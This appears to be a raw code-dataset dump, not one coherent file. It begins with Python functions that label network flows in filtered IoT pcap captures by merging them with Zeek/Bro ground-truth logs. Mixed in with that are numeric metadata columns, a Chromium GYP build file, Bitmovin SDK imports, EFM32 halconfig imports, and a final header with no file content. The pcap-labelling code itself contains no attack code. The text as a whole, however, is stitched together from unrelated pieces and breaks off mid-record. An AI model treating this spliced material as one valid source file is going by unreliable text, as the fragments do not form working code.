    Bug fixed vs. original: the no-bro-labels branch referenced the undefined
    ``combined_df`` (NameError); it now reindexes ``old_info_df``.

    :param path_to_iot_scenarios_folder: root folder with the original scenarios
    :param folder_to_filtered_files: root folder with the filtered pcaps
    :param filename_addition: suffix used in the filtered pcap file names
    """
    # (Removed three no-op self-assignments of the parameters.)
    scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
    with open(scan_file_order_path, 'r') as inputfile:
        scanned_files = inputfile.readlines()
    scanned_files_list = [x.strip() for x in scanned_files]
    scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
    scanned_files_list = sorted(list(set(scanned_files_list)))
    # Flow key columns used throughout the label-merging logic below.
    key_cols = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"]
    # Output column order is identical in both branches; build it once.
    columns_list = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", "ip_tos", "scenario", "file",
                    "connection_length", "label", "detailed_label", "detailed_label_count", "status"]
    for index, (scenario_name, file_name) in enumerate(scanned_files_list):
        print("Scenario name: " + scenario_name)
        print("File name : " + file_name)
        print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
        # Record progress so a crashed run can be resumed by the restart_* variant.
        log_order_path = folder_to_filtered_files + "/" + "log_order.txt"
        with open(log_order_path, 'a') as log_order_file:
            log_order_file.write(scenario_name + "," + file_name + "\n")
            log_order_file.close()
        print("Reading PCAP File")
        path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
        path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + filename_addition + ".pcap"
        path_to_original_folder = path_to_iot_scenarios_folder + "/" + scenario_name
        # (Dropped three unused *_old/_bro/_merge path variables.)
        file_packet_dic = {}
        with PcapReader(path_to_pcap_file) as packets:
            for packet_count, packet in enumerate(packets):
                # scapy's show(dump=True) yields a textual "key=value" dump per
                # layer; parse it into {layer: {field: value}}.
                packet_string = packet.show(dump=True)
                packet_string = packet_string.split("\n")
                packet_string = [x.replace(" ", "") for x in packet_string]
                current_layer = "none"
                packet_dic = {}
                for line in packet_string:
                    if len(line) > 0:
                        if line[0] == '#':
                            # Layer header line, e.g. "###[ IP ]###".
                            new_layer = line.split('[')[1].split(']')[0]
                            current_layer = new_layer
                            packet_dic[current_layer] = {}
                        elif (line[0] != '\\') & (line[0] != '|'):
                            key = line.split("=")[0]
                            value = line.split("=")[1]
                            packet_dic[current_layer][key] = value
                src_ip = packet_dic["IP"]["src"]
                dst_ip = packet_dic["IP"]["dst"]
                ip_protocol = packet_dic["IP"]["proto"].upper()
                if ip_protocol == "UDP" and "UDP" in packet_dic:
                    src_port = packet_dic["UDP"]["sport"]
                    dst_port = packet_dic["UDP"]["dport"]
                elif ip_protocol == "TCP" and "TCP" in packet_dic:
                    src_port = packet_dic["TCP"]["sport"]
                    dst_port = packet_dic["TCP"]["dport"]
                elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
                    # ICMP has no ports; encode type/code in the dst_port slot.
                    src_port = 0
                    dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
                else:
                    src_port = 0
                    dst_port = 0
                # scapy may report service names (e.g. "https"); map them to
                # numeric ports when the resolver knows them, else keep as-is.
                if not isinstance(src_port, int):
                    if not all(char.isdigit() for char in src_port):
                        try:
                            src_port = socket.getservbyname(src_port, ip_protocol)
                        except:
                            src_port = src_port
                if not isinstance(dst_port, int):  # (dropped a no-op "or ()" from the original)
                    if not all(char.isdigit() for char in dst_port):
                        try:
                            dst_port = socket.getservbyname(dst_port, ip_protocol)
                        except:
                            dst_port = dst_port
                ip_tos = packet_dic["IP"]["tos"]
                flow_key = (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos)
                if flow_key in file_packet_dic:
                    file_packet_dic[flow_key] = file_packet_dic[flow_key] + 1
                else:
                    file_packet_dic[flow_key] = 1
        # (Removed redundant packets.close(); the with-block closes the reader.)
        src_ip_list = []
        dst_ip_list = []
        ip_protocol_list = []
        src_port_list = []
        dst_port_list = []
        ip_tos_list = []
        connection_length_list = []
        for (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos), connection_length in file_packet_dic.items():
            src_ip_list.append(src_ip)
            dst_ip_list.append(dst_ip)
            ip_protocol_list.append(ip_protocol)
            src_port_list.append(src_port)
            dst_port_list.append(dst_port)
            ip_tos_list.append(ip_tos)
            connection_length_list.append(connection_length)
        data = {"src_ip": src_ip_list, "dst_ip": dst_ip_list, "ip_protocol" : ip_protocol_list, "src_port" : src_port_list,
                "dst_port" : dst_port_list, "ip_tos" : ip_tos_list, "connection_length": connection_length_list}
        old_info_df = pd.DataFrame(data)
        old_info_df["scenario"] = scenario_name
        old_info_df["file"] = file_name
        print("Adding Logg Data")
        sub_folders = [f.path for f in os.scandir(path_to_original_folder) if f.is_dir()]
        bro_folder_found = False
        labeled_files = []
        for sub_folder in sub_folders:
            base_name = str(os.path.basename(sub_folder))
            if base_name == "bro":
                labeled_files = glob.glob(sub_folder + "/*.labeled")
                bro_folder_found = True
                break
        if bro_folder_found and len(labeled_files) > 0:
            logg_file = labeled_files[0]
            # Renamed from `zat` to avoid shadowing the imported zat module.
            log_to_dataframe = LogToDataFrame()
            bro_original_df = log_to_dataframe.create_dataframe(logg_file)
            bro_original_df["label"] = bro_original_df["tunnel_parents label detailed-label"].apply(
                lambda x: x.split(" ")[1].strip())
            bro_original_df["detailed_label"] = bro_original_df["tunnel_parents label detailed-label"].apply(
                lambda x: x.split(" ")[2].strip())
            bro_original_df = bro_original_df.rename(columns={"id.orig_h": "src_ip", "id.resp_h": "dst_ip", "id.orig_p" : "src_port", "id.resp_p" : "dst_port", "proto" : "ip_protocol"})
            bro_original_df = bro_original_df.drop(
                columns=['uid', 'service', 'duration', 'orig_bytes', 'resp_bytes', 'conn_state', 'local_orig',
                         'local_resp', 'missed_bytes', 'history', 'orig_pkts', 'orig_ip_bytes',
                         'resp_pkts', 'resp_ip_bytes', 'tunnel_parents label detailed-label'])
            bro_original_df["ip_protocol"] = bro_original_df["ip_protocol"].str.upper()
            bro_original_df.sort_values(key_cols, inplace=True)
            # Count labels per flow so conflicting labels can be detected.
            bro_original_df = bro_original_df.groupby(key_cols)[
                'detailed_label'].value_counts().to_frame()
            bro_original_df = bro_original_df.rename(columns={"detailed_label": "detailed_label_count"})
            bro_original_df = bro_original_df.reset_index()
            # Normalize key columns to stripped strings so merges line up.
            for col in key_cols:
                bro_original_df[col] = bro_original_df[col].apply(lambda x: str(x).strip())
                bro_original_df[col] = bro_original_df[col].astype(str)
            bro_original_df = bro_original_df.sort_values(by=key_cols)
            bro_original_df = bro_original_df.set_index(key_cols)
            old_info_df = old_info_df.sort_values(key_cols)
            old_info_df = old_info_df.set_index(key_cols)
            # Pass 1: match flows in the forward direction.
            merged_df = old_info_df.merge(on=key_cols, right=bro_original_df, how="inner")
            merged_df = merged_df.reset_index()
            old_info_df = old_info_df.reset_index()
            detailed_label_df = merged_df.drop_duplicates(subset=key_cols, keep=False)
            detailed_label_df["status"] = "Found"
            deleted_df = merged_df[merged_df.duplicated(key_cols, keep=False)]
            deleted_df["status"] = "Mixed"
            # Pass 2: flows not matched forward are retried with src/dst swapped.
            to_check_df = pd.concat(
                [old_info_df, merged_df.drop_duplicates(subset=key_cols, keep='last')]).drop_duplicates(
                subset=key_cols, keep=False)
            to_check_df = to_check_df.reset_index()
            to_check_df = to_check_df.rename(columns={"src_ip": "dst_ip", "dst_ip": "src_ip", "src_port" : "dst_port", "dst_port" : "src_port"}).drop(
                columns=["detailed_label", "detailed_label_count"])
            for col in key_cols:
                to_check_df[col] = to_check_df[col].apply(lambda x: str(x).strip())
                to_check_df[col] = to_check_df[col].astype(str)
            to_check_df = to_check_df.set_index(key_cols)
            merged_df_2 = to_check_df.merge(on=key_cols, right=bro_original_df, how="left")
            merged_df_2 = merged_df_2.reset_index()
            merged_df_2 = merged_df_2.rename(columns={"src_ip": "dst_ip", "dst_ip": "src_ip", "src_port" : "dst_port", "dst_port" : "src_port"})
            detailed_label_2_df = merged_df_2.dropna()
            detailed_label_2_df["status"] = "Response"
            deleted_2_df = merged_df_2[merged_df_2.duplicated(key_cols, keep=False)]
            deleted_2_df["status"] = "Mixed"
            unknown_df = merged_df_2[merged_df_2.isnull().any(axis=1)]
            unknown_df["status"] = "Unknown"
            combined_detailed_label_df = detailed_label_df.append(detailed_label_2_df)
            combined_detailed_label_2_df = combined_detailed_label_df.drop_duplicates(subset=key_cols,
                                                                                     keep=False)
            # combined_detailed_label_2_df["status"] = "Keep"
            deleted_3_df = combined_detailed_label_df[
                combined_detailed_label_df.duplicated(key_cols, keep=False)]
            combined_deleted_df = deleted_df.append(deleted_2_df).append(deleted_3_df)
            combined_deleted_df = combined_deleted_df.drop_duplicates(subset=key_cols + ['detailed_label'],
                                                                     keep='last')
            combined_deleted_df["status"] = "Mixed"
            combined_df = combined_detailed_label_2_df.append(combined_deleted_df).append(unknown_df)
            combined_df["detailed_label"] = combined_df.detailed_label.astype(str)
            combined_df["detailed_label"] = combined_df["detailed_label"].fillna(value="Unknown")
            combined_df["detailed_label_count"] = combined_df["detailed_label_count"].fillna(value="0")
            combined_df["detailed_label"] = combined_df["detailed_label"].replace(to_replace="nan", value="Unknown")
            combined_df["detailed_label"] = combined_df["detailed_label"].replace(to_replace="-", value="Benign")
            combined_df["label"] = np.where(combined_df["detailed_label"] == "Benign", "Benign", "Malicious")
            combined_df["label"] = np.where(combined_df["detailed_label"] == "Unknown", "Unknown",
                                            combined_df["label"])
            combined_df = combined_df.reindex(columns=columns_list)
            combined_df.to_csv(path_to_csv_file, index=False)
        else:
            # No bro labels available: everything is written as Unknown.
            old_info_df["label"] = "Unknown"
            old_info_df["detailed_label"] = "Unknown"
            old_info_df["detailed_label_count"] = 0
            old_info_df["status"] = "Unknown"
            # BUGFIX: original reindexed the undefined `combined_df` here,
            # raising NameError whenever this branch was taken.
            old_info_df = old_info_df.reindex(columns=columns_list)
            old_info_df.to_csv(path_to_csv_file, index=False)
@staticmethod
def restart_creating_summary_from_separate_files_for_netflow(path_to_iot_scenarios_folder, folder_to_filtered_files,
                                                             filename_addition):
    """Resume building per-file connection summaries (netflow level) for filtered pcaps.

    Compares ``scan_order.txt`` against ``log_order.txt`` inside
    *folder_to_filtered_files* to find (scenario, file) pairs that were scanned
    but not yet summarised, then for each remaining pair:

    1. counts packets per (src_ip, dst_ip, proto, sport, dport, tos) connection
       in the filtered pcap,
    2. joins the counts with the Zeek/Bro ``*.labeled`` ground truth of the
       original scenario (also matching reversed flows as "Response"),
    3. writes ``<file>_summary.csv`` with label / detailed_label / status columns.

    Parameters
    ----------
    path_to_iot_scenarios_folder : str
        Root folder of the original IoT scenario captures (holds the ``bro`` dirs).
    folder_to_filtered_files : str
        Root folder with the filtered pcaps and the bookkeeping text files.
    filename_addition : str
        Suffix of the filtered pcap file name (``<file>_<addition>.pcap``).
    """
    scan_file_order_path = folder_to_filtered_files + "/scan_order.txt"
    log_order_path = folder_to_filtered_files + "/log_order.txt"

    with open(scan_file_order_path, 'r') as inputfile:
        scanned_files = inputfile.readlines()
    with open(log_order_path, 'r') as inputfile:
        logged_files = inputfile.readlines()

    scanned_files_list = [x.strip() for x in scanned_files]
    logged_files_list = [x.strip() for x in logged_files]

    # Only the files that were scanned but not yet logged still need work.
    folders_still_to_scan = [entry for entry in scanned_files_list if entry not in logged_files_list]
    folders = [(entry.split(",")[0], entry.split(",")[1]) for entry in folders_still_to_scan]

    merge_keys = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"]
    columns_list = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", "ip_tos", "scenario", "file",
                    "connection_length", "label", "detailed_label", "detailed_label_count", "status"]

    for index, (scenario_name, file_name) in enumerate(folders):
        print("Scenario name: " + scenario_name)
        print("File name : " + file_name)
        print("Number: " + str(index + 1) + "/" + str(len(folders)))

        # Record progress immediately so an interrupted run can be resumed.
        with open(log_order_path, 'a') as log_order_file:
            log_order_file.write(scenario_name + "," + file_name + "\n")

        print("Reading PCAP File")

        path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
        path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + filename_addition + ".pcap"
        path_to_original_folder = path_to_iot_scenarios_folder + "/" + scenario_name

        # Count packets per (src, dst, proto, sport, dport, tos) connection.
        file_packet_dic = {}
        with PcapReader(path_to_pcap_file) as packets:
            for packet in packets:
                # Parse scapy's textual dump into {layer: {field: value}}.
                packet_lines = [x.replace(" ", "") for x in packet.show(dump=True).split("\n")]
                current_layer = "none"
                packet_dic = {}
                for line in packet_lines:
                    if len(line) > 0:
                        if line[0] == '#':
                            # Layer header, e.g. "###[ IP ]###".
                            current_layer = line.split('[')[1].split(']')[0]
                            packet_dic[current_layer] = {}
                        elif (line[0] != '\\') & (line[0] != '|'):
                            key = line.split("=")[0]
                            value = line.split("=")[1]
                            packet_dic[current_layer][key] = value

                src_ip = packet_dic["IP"]["src"]
                dst_ip = packet_dic["IP"]["dst"]
                ip_protocol = packet_dic["IP"]["proto"].upper()

                if ip_protocol == "UDP" and "UDP" in packet_dic:
                    src_port = packet_dic["UDP"]["sport"]
                    dst_port = packet_dic["UDP"]["dport"]
                elif ip_protocol == "TCP" and "TCP" in packet_dic:
                    src_port = packet_dic["TCP"]["sport"]
                    dst_port = packet_dic["TCP"]["dport"]
                elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
                    # ICMP has no ports; encode type/code in the dst_port column.
                    src_port = 0
                    dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
                else:
                    src_port = 0
                    dst_port = 0

                # Scapy may print well-known service names instead of numbers;
                # translate them back where possible (best effort).
                # BUG FIX: dropped the no-op "or ()" from the original condition.
                if not isinstance(src_port, int) and not all(char.isdigit() for char in src_port):
                    try:
                        src_port = socket.getservbyname(src_port, ip_protocol)
                    except OSError:
                        pass  # keep the textual value when the lookup fails
                if not isinstance(dst_port, int) and not all(char.isdigit() for char in dst_port):
                    try:
                        dst_port = socket.getservbyname(dst_port, ip_protocol)
                    except OSError:
                        pass

                ip_tos = packet_dic["IP"]["tos"]

                connection = (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos)
                file_packet_dic[connection] = file_packet_dic.get(connection, 0) + 1

        # One row per connection, with its packet count.
        old_info_df = pd.DataFrame(
            [(src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos, connection_length)
             for (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos), connection_length
             in file_packet_dic.items()],
            columns=["src_ip", "dst_ip", "ip_protocol", "src_port", "dst_port", "ip_tos", "connection_length"])
        old_info_df["scenario"] = scenario_name
        old_info_df["file"] = file_name

        print("Adding Logg Data")

        # Locate the Zeek/Bro labeled connection log of the original scenario.
        labeled_files = []
        bro_folder_found = False
        sub_folders = [f.path for f in os.scandir(path_to_original_folder) if f.is_dir()]
        for sub_folder in sub_folders:
            if str(os.path.basename(sub_folder)) == "bro":
                labeled_files = glob.glob(sub_folder + "/*.labeled")
                bro_folder_found = True
                break

        if bro_folder_found and len(labeled_files) > 0:
            logg_file = labeled_files[0]
            zat = LogToDataFrame()
            bro_original_df = zat.create_dataframe(logg_file)

            # The combined Zeek column holds "tunnel_parents label detailed-label".
            bro_original_df["label"] = bro_original_df["tunnel_parents label detailed-label"].apply(
                lambda x: x.split(" ")[1].strip())
            bro_original_df["detailed_label"] = bro_original_df["tunnel_parents label detailed-label"].apply(
                lambda x: x.split(" ")[2].strip())
            bro_original_df = bro_original_df.rename(
                columns={"id.orig_h": "src_ip", "id.resp_h": "dst_ip", "id.orig_p": "src_port",
                         "id.resp_p": "dst_port", "proto": "ip_protocol"})
            bro_original_df = bro_original_df.drop(
                columns=['uid', 'service', 'duration', 'orig_bytes', 'resp_bytes', 'conn_state', 'local_orig',
                         'local_resp', 'missed_bytes', 'history', 'orig_pkts', 'orig_ip_bytes',
                         'resp_pkts', 'resp_ip_bytes', 'tunnel_parents label detailed-label'])
            bro_original_df["ip_protocol"] = bro_original_df["ip_protocol"].str.upper()

            # Count occurrences of each detailed label per 5-tuple.
            bro_original_df.sort_values(merge_keys, inplace=True)
            bro_original_df = bro_original_df.groupby(merge_keys)['detailed_label'].value_counts().to_frame()
            bro_original_df = bro_original_df.rename(columns={"detailed_label": "detailed_label_count"})
            bro_original_df = bro_original_df.reset_index()

            # Normalise the join keys on the Zeek side to stripped strings.
            for key_column in merge_keys:
                bro_original_df[key_column] = bro_original_df[key_column].apply(lambda x: str(x).strip())

            bro_original_df = bro_original_df.sort_values(by=merge_keys)
            old_info_df = old_info_df.sort_values(merge_keys)

            # Pass 1: match flows in capture direction.
            merged_df = old_info_df.merge(on=merge_keys, right=bro_original_df, how="inner")
            merged_df = merged_df.reset_index()
            old_info_df = old_info_df.reset_index()

            # Flows that matched exactly one label row are final ("Found");
            # flows matching several different labels are "Mixed".
            detailed_label_df = merged_df.drop_duplicates(subset=merge_keys, keep=False).copy()
            detailed_label_df["status"] = "Found"
            deleted_df = merged_df[merged_df.duplicated(merge_keys, keep=False)].copy()
            deleted_df["status"] = "Mixed"

            # Pass 2: unmatched flows are retried with src/dst swapped (responses).
            to_check_df = pd.concat(
                [old_info_df,
                 merged_df.drop_duplicates(subset=merge_keys, keep='last')]).drop_duplicates(
                subset=merge_keys, keep=False)
            to_check_df = to_check_df.reset_index()
            to_check_df = to_check_df.rename(
                columns={"src_ip": "dst_ip", "dst_ip": "src_ip", "src_port": "dst_port",
                         "dst_port": "src_port"}).drop(
                columns=["detailed_label", "detailed_label_count"])
            for key_column in merge_keys:
                to_check_df[key_column] = to_check_df[key_column].apply(lambda x: str(x).strip())
                to_check_df[key_column] = to_check_df[key_column].astype(str)
            to_check_df = to_check_df.set_index(merge_keys)

            merged_df_2 = to_check_df.merge(on=merge_keys, right=bro_original_df, how="left")
            # Swap the endpoints back to capture direction.
            merged_df_2 = merged_df_2.rename(
                columns={"src_ip": "dst_ip", "dst_ip": "src_ip", "src_port": "dst_port", "dst_port": "src_port"})

            detailed_label_2_df = merged_df_2.dropna().copy()
            detailed_label_2_df["status"] = "Response"
            deleted_2_df = merged_df_2[merged_df_2.duplicated(merge_keys, keep=False)].copy()
            deleted_2_df["status"] = "Mixed"
            unknown_df = merged_df_2[merged_df_2.isnull().any(axis=1)].copy()
            unknown_df["status"] = "Unknown"

            # Combine both passes; any flow still duplicated across them is "Mixed".
            combined_detailed_label_df = pd.concat([detailed_label_df, detailed_label_2_df])
            combined_detailed_label_2_df = combined_detailed_label_df.drop_duplicates(
                subset=merge_keys, keep=False)
            deleted_3_df = combined_detailed_label_df[
                combined_detailed_label_df.duplicated(merge_keys, keep=False)]

            combined_deleted_df = pd.concat([deleted_df, deleted_2_df, deleted_3_df])
            combined_deleted_df = combined_deleted_df.drop_duplicates(
                subset=merge_keys + ['detailed_label'], keep='last')
            combined_deleted_df["status"] = "Mixed"

            combined_df = pd.concat([combined_detailed_label_2_df, combined_deleted_df, unknown_df])
            combined_df["detailed_label"] = combined_df.detailed_label.astype(str)
            combined_df["detailed_label"] = combined_df["detailed_label"].fillna(value="Unknown")
            combined_df["detailed_label_count"] = combined_df["detailed_label_count"].fillna(value="0")
            # astype(str) turned missing labels into the literal "nan".
            combined_df["detailed_label"] = combined_df["detailed_label"].replace(to_replace="nan", value="Unknown")
            # Zeek marks benign connections with "-".
            combined_df["detailed_label"] = combined_df["detailed_label"].replace(to_replace="-", value="Benign")
            combined_df["label"] = np.where(combined_df["detailed_label"] == "Benign", "Benign", "Malicious")
            combined_df["label"] = np.where(combined_df["detailed_label"] == "Unknown", "Unknown",
                                            combined_df["label"])

            combined_df = combined_df.reindex(columns=columns_list)
            combined_df.to_csv(path_to_csv_file, index=False)
        else:
            # No ground truth available: every connection stays "Unknown".
            old_info_df["label"] = "Unknown"
            old_info_df["detailed_label"] = "Unknown"
            old_info_df["detailed_label_count"] = 0
            old_info_df["status"] = "Unknown"
            # BUG FIX: the original reindexed the undefined name `combined_df` here,
            # which raised NameError whenever no bro folder / labeled file existed.
            old_info_df = old_info_df.reindex(columns=columns_list)
            old_info_df.to_csv(path_to_csv_file, index=False)
| 55.764045
| 189
| 0.571745
| 4,269
| 34,741
| 4.219724
| 0.056454
| 0.040802
| 0.063506
| 0.030532
| 0.938548
| 0.934551
| 0.926002
| 0.924836
| 0.918952
| 0.914344
| 0
| 0.003813
| 0.305432
| 34,741
| 622
| 190
| 55.853698
| 0.742727
| 0.020149
| 0
| 0.756813
| 0
| 0
| 0.150867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006289
| false
| 0
| 0.050314
| 0
| 0.0587
| 0.027254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e7a8692e2e33795766d9ef7bad280086b02c3f7e
| 220
|
py
|
Python
|
bitmovin_api_sdk/encoding/encodings/streams/filters/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/encodings/streams/filters/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/encodings/streams/filters/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
from bitmovin_api_sdk.encoding.encodings.streams.filters.filters_api import FiltersApi
from bitmovin_api_sdk.encoding.encodings.streams.filters.stream_filter_list_list_query_params import StreamFilterListListQueryParams
| 73.333333
| 132
| 0.918182
| 28
| 220
| 6.857143
| 0.571429
| 0.125
| 0.15625
| 0.1875
| 0.510417
| 0.510417
| 0.510417
| 0.510417
| 0
| 0
| 0
| 0
| 0.036364
| 220
| 2
| 133
| 110
| 0.90566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
415c302f89eb8117ad7f9f42b965b371b0dfc200
| 297
|
py
|
Python
|
platform/hwconf_data/efm32zg/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | null | null | null |
platform/hwconf_data/efm32zg/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T02:36:22.000Z
|
2020-08-25T02:36:22.000Z
|
platform/hwconf_data/efm32zg/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T01:56:04.000Z
|
2020-08-25T01:56:04.000Z
|
import efm32zg.halconfig.halconfig_types as halconfig_types
import efm32zg.halconfig.halconfig_dependency as halconfig_dependency
import efm32zg.PythonSnippet.ExporterModel as ExporterModel
import efm32zg.PythonSnippet.RuntimeModel as RuntimeModel
import efm32zg.PythonSnippet.Metadata as Metadata
| 59.4
| 69
| 0.902357
| 34
| 297
| 7.764706
| 0.294118
| 0.246212
| 0.295455
| 0.234848
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035971
| 0.063973
| 297
| 5
| 70
| 59.4
| 0.913669
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d40c46d4ac1e751dbbe37d1278e9b0871ae0d933
| 2,743
|
gyp
|
Python
|
chrome/browser/resources/md_user_manager/compiled_resources2.gyp
|
google-ar/chromium
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 777
|
2017-08-29T15:15:32.000Z
|
2022-03-21T05:29:41.000Z
|
chrome/browser/resources/md_user_manager/compiled_resources2.gyp
|
harrymarkovskiy/WebARonARCore
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 66
|
2017-08-30T18:31:18.000Z
|
2021-08-02T10:59:35.000Z
|
chrome/browser/resources/md_user_manager/compiled_resources2.gyp
|
harrymarkovskiy/WebARonARCore
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 123
|
2017-08-30T01:19:34.000Z
|
2022-03-17T22:55:31.000Z
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
# Closure Compiler build targets for the MD user-manager WebUI.
# Each target compiles one JS module; shared WebUI helpers are pulled in
# via the <(DEPTH)/ui/webui/resources dependencies, and every target uses
# the common closure_compiler include.
'targets': [
{
'target_name': 'control_bar',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:cr',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'create_profile',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:util',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:web_ui_listener_behavior',
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
# No dependencies: error_dialog is self-contained.
'target_name': 'error_dialog',
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'import_supervised_user',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
# Browser-proxy module shared by most of the other targets above/below.
'target_name': 'profile_browser_proxy',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:assert',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:cr',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'supervised_user_create_confirm',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:util',
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'supervised_user_learn_more',
'dependencies': [
'profile_browser_proxy',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
# No dependencies: page container only.
'target_name': 'user_manager_pages',
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'user_manager_tutorial',
'dependencies': [
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:i18n_behavior',
'<(DEPTH)/ui/webui/resources/js/compiled_resources2.gyp:util',
],
'includes': ['../../../../third_party/closure_compiler/compile_js2.gypi'],
},
],
}
| 36.573333
| 90
| 0.618301
| 283
| 2,743
| 5.699647
| 0.24735
| 0.052077
| 0.089275
| 0.156231
| 0.82579
| 0.82579
| 0.82579
| 0.82579
| 0.769374
| 0.67018
| 0
| 0.015823
| 0.193584
| 2,743
| 74
| 91
| 37.067568
| 0.713382
| 0.056507
| 0
| 0.549296
| 0
| 0
| 0.706656
| 0.583978
| 0
| 0
| 0
| 0
| 0.014085
| 1
| 0
| true
| 0
| 0.014085
| 0
| 0.014085
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2e04f00e3890a8b78c64d89a3850c214b6625aee
| 4,795
|
py
|
Python
|
python/sdk/test/logger_test.py
|
karzuo/merlin
|
bdbdac35071d81beb1b8b5b807697bf2eac69a40
|
[
"Apache-2.0"
